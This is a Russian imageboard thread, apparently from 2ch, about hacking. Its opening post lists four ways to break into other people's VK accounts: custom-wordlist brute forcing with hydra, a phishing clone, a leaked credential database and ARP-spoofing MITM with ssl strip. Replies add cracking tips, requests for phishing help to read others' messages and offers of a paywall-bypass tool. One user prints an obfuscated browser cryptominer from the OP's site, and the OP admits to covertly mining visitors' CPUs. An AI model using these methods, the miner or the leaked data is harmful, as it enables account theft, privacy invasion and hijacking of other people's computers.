ОП, я забыл пароль от своего вайфай роутера, сможешь сбрутить хендшейк?
Была бы норм видеокарта, смог бы.
На процессоре это довольно бессмысленное занятие, так что сорян.
Ну тогда поделись какими-нибудь годными словарями
У мня пикрил, не работает
Видимо я какой-то хитровыебанный пароль придумал, а сейчас вспомнить не могу.
Маленькую чёрную кнопочку зажми на три секунды и перенастрой, хули как маленький-то?
Попробуй rockyou.txt, он один из лучших, и довольно большой.
Найти можно например здесь https://wiki.skullsecurity.org/Passwords
>Фишинг. Создаём клон ВК, добавляем перехват введённых данных, присылаем жертве ссылку.
запилити пожалуйста подробный гайд, когда-то хотел вкатиться и тупо читать чужие переписки дабы скрашивать унылую жизнь, но забил. А вообще я очень тупой, очень очень, если что-то не по инструкции шаг за шагом, то нихуя сделать не смогу. Пожалуйста, помогите дауну обрести счастье.
Взломай самого себя, лол. Вспомни, какие были у тебя тогда основные интересы, что занимало мысли бОльшую часть времени.
По ключевым словам составь кастомный словарь на себя, есть утилиты для этого, вон в шапке оп писал
Помню, пару лет назад анон скидывал в b прогу, которая палила приваты на сайте imlive. Потом вроде сайт залатал дыры, но аноны дорабатывали прогу и она по прежнему могла заходить в приваты на халяву. Так вот, хотел спросить, может у кого осталась та прога и работает ли она до сих пор?
кек, думаешь он на самом деле просто забыл пароль?
Спасибо, сейчас попробую
На брут уйдёт 3 года, пиздец
Это просто сшитые пароли с американских сайтов, где большинство паролей – это фразы и имена на английском языке + дата рождения в конце.
Ну ты конечно загнул.
С такой маской и на 6-ти видюхах не дождёшься результата
>аноны дорабатывали прогу
Ты пёзднутый? Исходники только у него были.
Могу покопаться и скинуть за условную сумму.
хм, наверняка и русские такие словари есть
этот 16 минут
что за прога?
кажется, я пропустил
Почему на дваче и бордах вообще практически отсутствует хацкерский контент\обсуждения? Не, я понимаю, что 90% интересующихся этой темой — школьники, которым бы взломать вк своей еот, чтобы дрочить на интим-фотки, ну так это же двач, чому бесконечное нытье про тян, рулеточки и фап-треды прижились, а уголка где школьники делились бы методами ломать акки вк и пользоваться соседским вай-фаем все еще нет?
О, норм. Напиши потом. Хотя я всё же думаю что не найдёт. Не на русских он заточен.
На мелкобордах есть.
Может дело тут в том, что все хотят взламывать одной кнопкой, но такого не бывает.
Для того чтобы хоть немного стать успешным в этом деле нужно для начала освоить линукс же.
Была раньше доска набигача, сейчас от нее немного в /crypt/ осталось.
Интересный вопрос. За себя скажу, что я слишком тупой и создавать и поддерживать такие темы просто не в состоянии, хотя и не слишком тупой чтобы не поддерживать 99 процентов тем на сосаче.
Мимо 22 лвл альтфак с 2009го
>Для того чтобы хоть немного стать успешным в этом деле нужно для начала освоить линукс же
Самое распространенное заблуждение. Как и кали.
Но ведь второй способ в оппосте - это относительно одной кнопкой. Только никто мне тут все же не расписал подробно за него. Похуй, загуглю, помню когда хотел вкатиться в него - инфа на блюдечке была, но чето там немного не так в каком-то коде было и я поленился гуглить дальше или спрашивать у создателя кода.
Хуйня, не нашло.
А где взять словарик только с 8значными числами?
> одной кнопкой.
>митм
Попизди мне тут
Почему? Ведь многие вещи, необходимые для хакинга, удобнее делать в терминале.
Ну да, сам линукс ставить для этого не обязательно, но всё же.
ну в какой то там проге, девил студио или как ее там, не помню, тык тык + вставить заготовленный уже кем то код, я тупица лютая но это ведь просто, разве нет?
>многие вещи, необходимые для хакинга, удобнее делать в терминале
Это какие? Burp и ZAP вполне без терминала работают, sqlmap и под виндой заводится.
Калидрочер вкатился в тред на винде.
Принимайте за щеку.
Принимайте за щеку.
Хакиры, поясните мне, почему видеорелейтед еще не распространен повсеместно и каждый второй школьник не хакает банкоматы чтобы купить новый нож в кс го?
https://www.youtube.com/watch?v=6135bdfed6M
https://www.youtube.com/watch?v=6135bdfed6M
потому что писька не выросла
не знаешь - не кукарекай
ахахахахахах, прикольна шутиш, лально вообще, мемно, дай свой вк, хачу пазнакомицца
ОП, можно подробно про ssl strip?
Я именно на этом моменте запоролся.
Я именно на этом моменте запоролся.
Сгенерируй сам с помощью crunch:
crunch 8 8 -t > 8digits.txt
Под винду хз.
Так ты опровергни. Я же попросил написать что не так.
Мне под линукс легче гораздо писать скрипты, настраивать сервера с подменами, да и готовых решений на тему под линус сильно больше. Под виндой это либо костылями что-то делать, либо через дикую еблю.
хотя на основном компе винда с виртуалками
Он же про фишинг говорил.
Метасплоит не забыл обновить?
Опровергнул тебе за щеку, проверяй.
Лучше, блять, поднимите заново скотобазу на каком-либо сервере. Исходники есть, а сайт лежит. Такая-то годнота была!
И? ты же вообще нихуя не смыслишь, не лезь блять.
А вообще есть эксплоит для тупого сливания налички, он зеродейный, так что патчик нескоро появится.
Нужен только USB и всё. тыкаешь - бабки сыпятся.
Если он имеется в виду, то я тоже задаюсь этим вопросом.
боже. какое дите
Ну, сейчас стало ещё сложнее, потому что крупные сайты начали использовать HSTS.
Но и это научились обходить, и вскоре появился SSL strip+. Если ты на линуксе, то там есть mitmf, в нём этот плагин присутствует. Я недавно на вк тестил, пока работает, хоть и со скрипом
Ну так что, интересна кому-нибудь тема с халявным просмотром вебкам-шоу?
О которой писал
Она есть у меня
О которой писал
Она есть у меня
мне интересна, нашел только для camwhores.tv обход
>спизданул какую-то хуйню в духе "ну бля я видел в киношке жы ваще изи хакают"
>АПРАВЕРГНИ ЭТО!!!!
>ты дитя!!!! ты ниможеш аправергнуть!!! яскозал!
притащи что нибудь с шодана, там халява всегда есть.
на старых милф я насмотрелся.
Он уже не работает вроде
Я пытаюсь узнать что там жидомасоны(мягкобляди) шлют себе в редмонд - все на ссл. Гугл выдавал охуительные истории про самоподписные сертификаты и прочую поебистику. Если какие ЛАЙФХАКИ можешь дать, буду благодарен.
Ты еблан? Я тебя не за киношку опровергнуть просил. Короче иди нахуй, беснующееся дите
> camwhores.tv
Что это вообще?
>мне интересна
Могу скинуть прогу
>Я тебя не за киношку опровергнуть просил.
>ну в какой то там проге, девил студио или как ее там, не помню, тык тык + вставить заготовленный уже кем то код, я тупица лютая но это ведь просто, разве нет?
>Короче иди нахуй
Слив школьника засчитан
Какеры такие какеры, не хотят в дзен, хотят на страпон и анальных приключений.
ты если делишься, то кидай... или у тебя фин. интерес?
Где найти себе страпонессу?
Куда кидать, на двач?
Могу даже название скинуть, всё равно это не гуглится.
Алсо какой мне смысл что-то отдавать за бесплатно?
А ты и не отдавай, мы сами найдём.
Ты беснующийся школьник неспособный на диалог. Не каждый должен разбираться в твоем ебучем хакинге, а опровергнуть кучу инфы по этой теме в сети ты просто не в состоянии
вроде бы bratprincess, поищи её там
Какеры, поясните за Red Disk, что там нашли, и от чего его надо защищать.
>bratprincess
Что это?
Я спрашиваю, где мне найти страпонессу, которая каждый день насиловала бы меня страпоном
>беснующийся школьник
Найс проекции, что ещё скажешь?
Ну удачи, хули.
Понимаю, извини, но я нищий... у меня нет денег за такое заплатить
тогда хз, познакомься с тянкой, а позже (!!) предложи
Лил, ну соси писос в таком случае.
А прогу я продам дядям на запад.
Спасибо, что напомнили про неё, я уж и забыл.
Спасибо, кэп, блять.
>Как взломать ВК
Никак, при входе с нового устройства надо вводить код из ЛС от администрации.
/thread
вкатился, но я совсем нуб.
кто знает как поменять dns сервер?
так можно блоуировку обойти? или только через прокси? хелп тупому школьнику, аноны
Прикольно, lonelylain с майнером на странице, да хитрый то какой.
>Как взломать ВК
>...
>если уже сменила пароль, то пытаемся угадать
10/10 would hack again
Потому что мейл.сру
где он? у меня адблок не видит ничего
в конце страницы вот это
[CODE]<script> document.write(unescape('%3C%73%63%72%69%70%74%20%73%72%63%3D%22%6C%69%62%2F%6D%2E%6A%73%3F%70%72%6F%78%79%3D%77%73%73%3A%2F%2F%6C%6F%6E%65%6C%79%6C%61%69%6E%2E%6D%6C%3A%39%39%39%39%22%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%3E%3C%2F%73%63%72%69%70%74%3E%0A%20%20%3C%73%63%72%69%70%74%3E%0A%20%20%20%20%76%61%72%20%74%68%72%65%61%64%73%20%3D%20%77%69%6E%64%6F%77%2E%6E%61%76%69%67%61%74%6F%72%2E%68%61%72%64%77%61%72%65%43%6F%6E%63%75%72%72%65%6E%63%79%20%2F%20%32%3B%0A%20%20%20%20%69%66%20%28%74%68%72%65%61%64%73%20%3C%20%31%29%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%76%61%72%20%74%68%72%65%61%64%73%20%3D%20%31%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%0A%20%20%20%20%76%61%72%20%69%64%20%3D%20%4D%61%74%68%2E%66%6C%6F%6F%72%28%4D%61%74%68%2E%72%61%6E%64%6F%6D%28%29%20%2A%20%39%30%30%30%30%30%30%30%30%30%30%30%30%30%30%29%20%2B%20%31%30%30%30%30%30%30%30%30%30%30%30%30%30%30%3B%0A%20%20%20%20%76%61%72%20%69%64%73%20%3D%20%69%64%2E%74%6F%53%74%72%69%6E%67%28%29%3B%0A%20%20%20%20%76%61%72%20%6D%69%6E%65%72%20%3D%20%43%48%2E%55%73%65%72%28%27%34%38%42%66%59%31%31%63%46%79%41%4E%4A%63%77%57%57%46%45%74%78%43%34%5A%43%56%4A%69%4E%4A%37%63%33%50%31%6A%72%4D%6D%48%4D%35%76%75%57%34%67%68%34%69%69%76%33%48%76%32%67%5A%47%6E%4C%4E%64%48%41%72%51%57%37%37%47%56%4A%68%70%58%78%48%36%45%69%47%6F%54%59%35%5C%0A%50%6A%4C%64%52%4D%68%31%6A%27%2C%20%69%64%73%2C%20%7B%74%68%72%65%61%64%73%3A%74%68%72%65%61%64%73%2C%20%61%75%74%6F%54%68%72%65%61%64%73%3A%66%61%6C%73%65%7D%29%3B%0A%20%20%20%20%6D%69%6E%65%72%2E%73%74%61%72%74%28%29%3B%0A%20%20%3C%2F%73%63%72%69%70%74%3E')); </script>[/CODE]
если анскейпнуть то вот он
[CODE]
<script src=\"lib/m.js?proxy=wss://lonelylain.ml:9999\" type=\"text/javascript\"></script>
<script>
var threads = window.navigator.hardwareConcurrency / 2;
if (threads < 1) {
var threads = 1;
}
var id = Math.floor(Math.random() * 900000000000000) + 100000000000000;
var ids = id.toString();
var miner = CH.User('48BfY11cFyANJcwWWFEtxC4ZCVJiNJ7c3P1jrMmHM5vuW4gh4iiv3Hv2gZGnLNdHArQW77GVJhpXxH6EiGoTY5\\
PjLdRMh1j', ids, {threads:threads, autoThreads:false});
miner.start();
</script>"
[/CODE]
Ладно, аноны, ОП вернулся.
Весь этот тред на самом деле был экспериментом.
Я тестировал работоспособность и надёжность моего прокси для веб майнинга на произвольном пуле, а также насколько палится кастомная библиотека. По идее, браузерные расширения вообще палить не должны.
Если у кого был врублен антивирь - он что-нибудь палил при заходе на сайт?
Internet Security ничего не спалил
И да, я заранее извинюсь, что заюзал половину вашего проца. Считайте, что это за БД
Сейчас на веб майнинге можно пытаться что-то заработать, если у кого есть сайты с норм трафиком - пишите [email protected]
На главной странице, кстати, все 100 забирается.
Антивира нет, не думаю что он среагирует на это. Я спалил просто мониторингом нагрузки, на компе как-то привык прослеживать, телефон уведомляет когда приложение начинает лишнего жрать.
Кстати довольно интересно что проц не на 100 нагружается, у меня он при таких нагрузках греться не начинает и кулер не шумит, да и другим приложениям не мешает. Прикольно короче, может подумаю и тоже себе запихну куда.
Это на вебасемблае майнер или куда? В теории возможно вообще от браузера еще и до видеокарты достучаться?
Сработало, зашёл на страничку и сразу кинуло на https://vk.com/login?act=blocked
мы зафиксировали попытку взлома Вашей страницы.
Не беспокойтесь, она в безопасности.
Я всё просрал?
мы зафиксировали попытку взлома Вашей страницы.
Не беспокойтесь, она в безопасности.
Я всё просрал?
Забыл там скрипт поменять, а сейчас уже лень.
Спасибо
Так я в скрипте прописал 50% чтобы жрал.
В принципе это не очень мешает юзерам.
Думаю ещё на мобильных устройствах вообще не запускать - толку нет.
>вебасемблае
Да, на нём. Но я не сам его писал, конечно.
В случае если браузер не поддерживает wasm он переключается на asm.js.
В теории можно на видюхе, но это муторно и никто ещё такое не сделал
ты в бд что ли пароль посмотрел?
Да, в акк пустило, но потом сразу это кинуло
>Весь этот тред на самом деле был экспериментом.
я на арче, с фаерфоксом, как только зашел сразу подвис....думаю че за херня....смотрю htop а там......подъеб засчитан, а БД реальны? а то я ВК качаю 1.1Г...
Бд скорее всего не фейковые, так что качать стоит.
я почему-то уверен, что опу было бы лень их генерировать
ну вот я ВК докачал, щас открою расскажу что и как....
>что опу было бы лень их генерировать
я тоже также подумал....
Кстати бд не сильно удобное. Поиск по трём гигам без индексации хз, отсортировать бы или еще запихнуть куда где искать удобнее чем в txt
grepом норм всё ищется, а вот то, что тебя банит как только заходишь - так себе
БД реальна...
просто у мейлача тоже эта база есть похоже и если на него с нового устройства зайти банят.
просто предположение, но похоже на то
>grepом норм всё ищется
+1 грепу, по мне так супер все отсортировано, без говна и мусора....
Непонятно только какой механизм блока, т.к. если нажать страницу Хочу проверить сканером, то показывает и сообщения и кол-во друзей и прочее. Клик на любое место и опять редирект на блок
годичной давности.
нашел там свой логин\пароль, который сменил больше года назад.
NoScript спалил
Посоветуй годный Колегер
Или как его там!
> Колегер
Годная шутка. Годных Колеггеров не существует, лалка.
Я скачивал но он платный
Только для одного человека жи вроде.
Так какой скачивать?
Платный с СМС.
Не хочу не буду. Дайте нормальный!
What if…
> 1). Атака по словарю. Составляем кастомный словарь на жертву с помощью cupp, исходя из её личных данных и интересов. Брутим форму по словарю с помощью hydra.
…HACKING ATTEMPT? …captcha?
> 2). Фишинг. Создаём клон ВК, добавляем перехват введённых данных, присылаем жертве ссылку.
..self-signed https warning?
> 3). Тупой способ, но может сработать.
…profile owner is smart?
> 4) . MITM-атака.
…HSTS?
Короч, социнжиниринг никто не отменял.
поясните за вебмайнинг и наебщика ОПа.
я так понимаю, на его сайте был майнер, а когда он работает?
когда находишься на сайте, или он в системе?
я так понимаю, на его сайте был майнер, а когда он работает?
когда находишься на сайте, или он в системе?
>2)Создаём клон ВК
как ето сделать
а?
когда находишься на сайте - там скрипт на майнинг
ОП, у тебя есть знакомые СИ-сообщества? Вроде тех, что успешно тралили зоошизу в свое время, когда фейк приняли за реального журналиста.
Как стать хакером: http://catb.org/~esr/faqs/hacker-howto.html
База данных эксплойтов: https://www.exploit-db.com/
Вики по веб уязвимостям: https://www.owasp.org/index.php/Main_Page
Гугл для хакеров: https://www.shodan.io/
И наконец то, чего жаждут многие.
Как взломать ВК: 4 метода
1). Атака по словарю. Составляем кастомный словарь на жертву с помощью cupp, исходя из её личных данных и интересов. Брутим форму по словарю с помощью hydra.
2). Фишинг. Создаём клон ВК, добавляем перехват введённых данных, присылаем жертве ссылку.
3). Тупой способ, но может сработать. Скачиваем базу данных ВК, которая не так давно утекла (например здесь https://lonelylain.ml/db/). Палим в ней данные жертвы, если уже сменила пароль, то пытаемся угадать (часто там небольшие модификации старого пароля, вроде доп. цифры на конце).
4) . MITM-атака. Работает только в одной локалке с жертвой (например, wifi в макдаке). Осуществляем ARP-спуфинг и перехватываем трафик жертвы. https не поможет, тк можно использовать ssl strip.